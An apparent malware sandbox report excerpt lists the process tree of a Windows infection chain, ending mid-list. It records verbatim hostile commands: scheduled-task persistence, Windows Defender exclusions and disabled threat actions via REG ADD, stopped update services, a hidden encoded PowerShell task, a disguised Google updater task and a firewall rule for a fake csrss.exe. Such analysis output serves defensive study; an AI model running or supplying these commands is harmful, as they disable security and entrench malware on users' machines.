PID 3836 wrote to memory of 4172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3836 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3836 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3836 wrote to memory of 1856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3836 wrote to memory of 1856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3836 wrote to memory of 1856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2728 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4220 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe
PID 4220 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe
PID 4220 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe
PID 3836 wrote to memory of 3704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe

"C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe"

C:\Users\Admin\AppData\Local\Temp\31D9.exe

C:\Users\Admin\AppData\Local\Temp\31D9.exe

C:\Users\Admin\AppData\Local\Temp\3303.exe

C:\Users\Admin\AppData\Local\Temp\3303.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\33EE.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\34AA.exe

C:\Users\Admin\AppData\Local\Temp\34AA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\3567.exe

C:\Users\Admin\AppData\Local\Temp\3567.exe

C:\Users\Admin\AppData\Local\Temp\3652.exe

C:\Users\Admin\AppData\Local\Temp\3652.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 724 -s 568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\F8F7.exe

C:\Users\Admin\AppData\Local\Temp\F8F7.exe

C:\Users\Admin\AppData\Local\Temp\FBD7.exe

C:\Users\Admin\AppData\Local\Temp\FBD7.exe

C:\Users\Admin\AppData\Local\Temp\FD10.exe

C:\Users\Admin\AppData\Local\Temp\FD10.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 756

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\7zS2C5.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JL1UK.tmp\is-AND0J.tmp" /SL4 $D01DA "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\7zS8B1.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gcuSfjXVo" /SC once /ST 02:41:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gcuSfjXVo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\AppData\Local\Temp\4ECB.exe

C:\Users\Admin\AppData\Local\Temp\4ECB.exe

C:\Users\Admin\AppData\Local\Temp\563E.exe

C:\Users\Admin\AppData\Local\Temp\563E.exe

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 580

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gcuSfjXVo"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KTEDKbX.exe\" 3Y /WVsite_idVfF 385119 /S" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KTEDKbX.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KTEDKbX.exe 3Y /WVsite_idVfF 385119 /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

